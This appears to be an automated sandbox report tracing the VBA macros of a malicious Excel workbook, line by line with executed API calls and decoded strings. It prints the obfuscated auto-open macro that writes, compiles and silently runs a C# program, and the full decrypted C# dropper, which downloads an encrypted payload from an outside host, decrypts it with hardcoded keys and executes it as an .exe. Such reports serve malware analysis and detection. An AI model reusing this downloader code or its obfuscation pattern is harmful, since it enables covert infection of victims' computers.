| "VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09" | |
| "VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09" | |
| "U2xaa1NsUnJVa3BWYVZVOQ==" | |
| "WTIxa0lDOWpJQT09" |
| Line | Instruction | Meta Information |
|---|---|---|
| 9 | Sub DGpkkrErsYIk() | |
| 10 | On Error Resume Next | executed |
| 11 | rpHTVPhPlNzeiOHkGWhPpSxNM | |
| 13 | Dim sHGrKuYlLfwgSUQegyJrbsXCMR as String | |
| 14 | Dim fOxWYueUOOdMcrNtVk as String | |
| 16 | Range("C3:C15") = Application.Transpose(Array("xxxx", "xxxx", "xxxx", "USD, EUR", "USD, EUR", "US, CA", "xxxx", "xxxx", "xxxx", "xxxx", "xxxx", "USD, EUR", "USD, EUR")) | Transpose Array |
| 17 | sHGrKuYlLfwgSUQegyJrbsXCMR = Module1.bRfcoUjl(Module3.tpqfxxQMYW("VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09"), 6) | |
| 18 | sHGrKuYlLfwgSUQegyJrbsXCMR = sHGrKuYlLfwgSUQegyJrbsXCMR & Module3.tpqfxxQMYW(Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("V0VVeGNGa3pTblpqTWpsdFpFWjNQUT09"))) | |
| 19 | sHGrKuYlLfwgSUQegyJrbsXCMR = sHGrKuYlLfwgSUQegyJrbsXCMR & GRjYTpXPjoJ(12) | |
| 20 | sHGrKuYlLfwgSUQegyJrbsXCMR = sHGrKuYlLfwgSUQegyJrbsXCMR & Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("TG1WNFpRPT0=")) | |
| 22 | fOxWYueUOOdMcrNtVk = Module1.bRfcoUjl(Module3.tpqfxxQMYW("VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09"), 3) | |
| 23 | fOxWYueUOOdMcrNtVk = fOxWYueUOOdMcrNtVk & Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("WEUxcFkzSnZjMjltZEZ3PQ==")) | |
| 24 | fOxWYueUOOdMcrNtVk = fOxWYueUOOdMcrNtVk & GRjYTpXPjoJ(12) | |
| 25 | fOxWYueUOOdMcrNtVk = fOxWYueUOOdMcrNtVk & Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("TG1Oeg==")) | |
| 27 | yiJhmgQqpGEP = Module1.bRfcoUjl("U2xaa1NsUnJVa3BWYVZVOQ==", 2) | |
| 28 | yiJhmgQqpGEP = yiJhmgQqpGEP & Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("WEUxcFkzSnZjMjltZEM1T1JWUmNSbkpoYldWM2IzSnJYSFkwTGpBdU16QXpNVGxjWTNOakxtVjRaUT09")) | |
| 29 | yiJhmgQqpGEP = yiJhmgQqpGEP & " " & Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("TDNSaGNtZGxkRHAzYVc1bGVHVWdMMjkxZERvaQ==")) | |
| 30 | yiJhmgQqpGEP = yiJhmgQqpGEP & sHGrKuYlLfwgSUQegyJrbsXCMR | |
| 31 | yiJhmgQqpGEP = yiJhmgQqpGEP & Module3.tpqfxxQMYW("IiAi") | |
| 32 | yiJhmgQqpGEP = yiJhmgQqpGEP & fOxWYueUOOdMcrNtVk | |
| 33 | yiJhmgQqpGEP = yiJhmgQqpGEP & Module3.tpqfxxQMYW("Ig==") | |
| 35 | AnokPRtKBZYK 231231, fOxWYueUOOdMcrNtVk, GvEUiwUw() | |
| 36 | Shell Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("WTIxa0lDOWpJQT09")) + yiJhmgQqpGEP + " & " + """" + sHGrKuYlLfwgSUQegyJrbsXCMR + """", 0 | Shell("cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:winexe /out:"C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe" "C:\Users\luketaylor\AppData\Roaming\Microsoft\aht914kagfz6.cs" & "C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe"",0) -> 3116 executed |
| 37 | End Sub |
| APIs | Meta Information |
|---|---|
CreateTextFile | FileSystemObject.CreateTextFile("C:\Users\luketaylor\AppData\Roaming\Microsoft\aht914kagfz6.cs",True) |
Write | TextStream.Write("using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Net; using System.Security.Cryptography; using System.Text; using System.Threading; using System.Windows.Forms; class P { static Form frm; static void Main() { Application.EnableVisualStyles(); Thread.Sleep(30000); frm = new Form(); frm.Opacity = 0; frm.ShowInTaskbar = false; frm.WindowState = FormWindowState.Minimized; frm.Shown += fs; Application.Run(frm); } static void Operatur(object o) { while(true) try { byte[] rawBytes = null; while (rawBytes == null || rawBytes.Length < 2048) { try { using (WebClient wc = new WebClient())rawBytes = wc.DownloadData("http://secure.dropinbox.pw:443"); } catch { } System.Threading.Thread.Sleep(15000); } string path = Path.ChangeExtension(Path.GetRandomFileName(),".exe"); List<byte> lBytes = new List<byte>(); byte[] pData = ProcessData(rawBytes, Encoding.UTF8.GetBytes("2015a9f6-0e91-411c-b83c-df232d68d681")); if(BitConverter.ToUInt16(pData, 0) != 0x5a4d) { rawBytes = new byte[0]; throw new Exception(); } lBytes.AddRange(pData); lBytes.AddRange(Guid.NewGuid().ToByteArray()); File.WriteAllBytes(path, lBytes.ToArray()); Process.Start(path); break; } catch { } try { frm.Invoke(new MethodInvoker(f)); } catch { } } static void f() { frm.Close(); } static void fs(object sender, EventArgs e) { ThreadPool.QueueUserWorkItem(Operatur); } static byte[] ProcessData(byte[] arr, byte[] pepper) { byte[] output; byte[] saltBytes = Encoding.UTF8.GetBytes("e5699260-5bfe-4cca-8bfc-242874860c61"); using (MemoryStream ms = new MemoryStream()) using (RijndaelManaged rij = new RijndaelManaged()) { rij.KeySize = 256; rij.BlockSize = 128; Rfc2898DeriveBytes key = new Rfc2898DeriveBytes(pepper, saltBytes, 100); rij.Key = key.GetBytes(rij.KeySize / 8); rij.IV = key.GetBytes(rij.BlockSize / 8); rij.Mode = CipherMode.CBC; using (CryptoStream cs = new CryptoStream(ms, rij.CreateDecryptor(), CryptoStreamMode.Write)) cs.Write(arr, 0, arr.Length); output = ms.ToArray(); } return output; } }") |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Close |
| Strings | Decrypted Strings |
|---|---|
| "VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9" |
| Line | Instruction | Meta Information |
|---|---|---|
| 39 | Sub AnokPRtKBZYK(ByVal LdeJWBv, ByVal AlSqDjbGA, ByVal WwQiEdghFWuYBui) | |
| 40 | Set DunRGbwIqzDm = CreateObject(Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9"))).CreateTextFile(AlSqDjbGA, True) | FileSystemObject.CreateTextFile("C:\Users\luketaylor\AppData\Roaming\Microsoft\aht914kagfz6.cs",True) executed |
| 41 | DunRGbwIqzDm.Write Module3.tpqfxxQMYW(WwQiEdghFWuYBui) | TextStream.Write("using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Net; using System.Security.Cryptography; using System.Text; using System.Threading; using System.Windows.Forms; class P { static Form frm; static void Main() { Application.EnableVisualStyles(); Thread.Sleep(30000); frm = new Form(); frm.Opacity = 0; frm.ShowInTaskbar = false; frm.WindowState = FormWindowState.Minimized; frm.Shown += fs; Application.Run(frm); } static void Operatur(object o) { while(true) try { byte[] rawBytes = null; while (rawBytes == null || rawBytes.Length < 2048) { try { using (WebClient wc = new WebClient())rawBytes = wc.DownloadData("http://secure.dropinbox.pw:443"); } catch { } System.Threading.Thread.Sleep(15000); } string path = Path.ChangeExtension(Path.GetRandomFileName(),".exe"); List<byte> lBytes = new List<byte>(); byte[] pData = ProcessData(rawBytes, Encoding.UTF8.GetBytes("2015a9f6-0e91-411c-b83c-df232d68d681")); if(BitConverter.ToUInt16(pData, 0) != 0x5a4d) { rawBytes = new byte[0]; throw new Exception(); } lBytes.AddRange(pData); lBytes.AddRange(Guid.NewGuid().ToByteArray()); File.WriteAllBytes(path, lBytes.ToArray()); Process.Start(path); break; } catch { } try { frm.Invoke(new MethodInvoker(f)); } catch { } } static void f() { frm.Close(); } static void fs(object sender, EventArgs e) { ThreadPool.QueueUserWorkItem(Operatur); } static byte[] ProcessData(byte[] arr, byte[] pepper) { byte[] output; byte[] saltBytes = Encoding.UTF8.GetBytes("e5699260-5bfe-4cca-8bfc-242874860c61"); using (MemoryStream ms = new MemoryStream()) using (RijndaelManaged rij = new RijndaelManaged()) { rij.KeySize = 256; rij.BlockSize = 128; Rfc2898DeriveBytes key = new Rfc2898DeriveBytes(pepper, saltBytes, 100); rij.Key = key.GetBytes(rij.KeySize / 8); rij.IV = key.GetBytes(rij.BlockSize / 8); rij.Mode = CipherMode.CBC; using (CryptoStream cs = new CryptoStream(ms, rij.CreateDecryptor(), CryptoStreamMode.Write)) cs.Write(arr, 0, arr.Length); output = ms.ToArray(); } return output; } }") executed |
| 42 | DunRGbwIqzDm.Close | Close |
| 43 | End Sub |
| APIs | Meta Information |
|---|---|
Part of subcall function DGpkkrErsYIk@ThisWorkbook: Transpose | |
Part of subcall function DGpkkrErsYIk@ThisWorkbook: Array | |
Part of subcall function DGpkkrErsYIk@ThisWorkbook: Shell |
| Line | Instruction | Meta Information |
|---|---|---|
| 62 | Sub Workbook_Open() | |
| 63 | DGpkkrErsYIk | executed |
| 64 | End Sub |
| APIs | Meta Information |
|---|---|
Len | Len("abcdefghijklmnopqrstuvwxyz0123456789") -> 36 |
Stack | |
Randomize | |
Mid | |
Stack | |
Int | |
Rnd |
| Strings | Decrypted Strings |
|---|---|
| "abcdefghijklmnopqrstuvwxyz0123456789" |
| Line | Instruction | Meta Information |
|---|---|---|
| 45 | Function GRjYTpXPjoJ(ByVal email) | |
| 46 | Dim str, mi, ma | executed |
| 47 | Const Stack = "abcdefghijklmnopqrstuvwxyz0123456789" | |
| 48 | mi = 1 | |
| 49 | ma = Len(Stack) | Len("abcdefghijklmnopqrstuvwxyz0123456789") -> 36 Stack executed |
| 50 | Randomize | Randomize |
| 51 | For i = 1 To email | |
| 52 | str = str & Mid(Stack, Int((ma - mi + 1) * Rnd + mi), 1) | Mid Stack Int Rnd |
| 53 | Next | |
| 54 | GRjYTpXPjoJ = str | |
| 55 | End Function |
Non-Executed Functions |
|---|
| APIs | Meta Information |
|---|---|
Part of subcall function DGpkkrErsYIk@ThisWorkbook: Transpose | |
Part of subcall function DGpkkrErsYIk@ThisWorkbook: Array | |
Part of subcall function DGpkkrErsYIk@ThisWorkbook: Shell |
| Line | Instruction | Meta Information |
|---|---|---|
| 58 | Sub AutoOpen() | |
| 59 | DGpkkrErsYIk | |
| 60 | End Sub |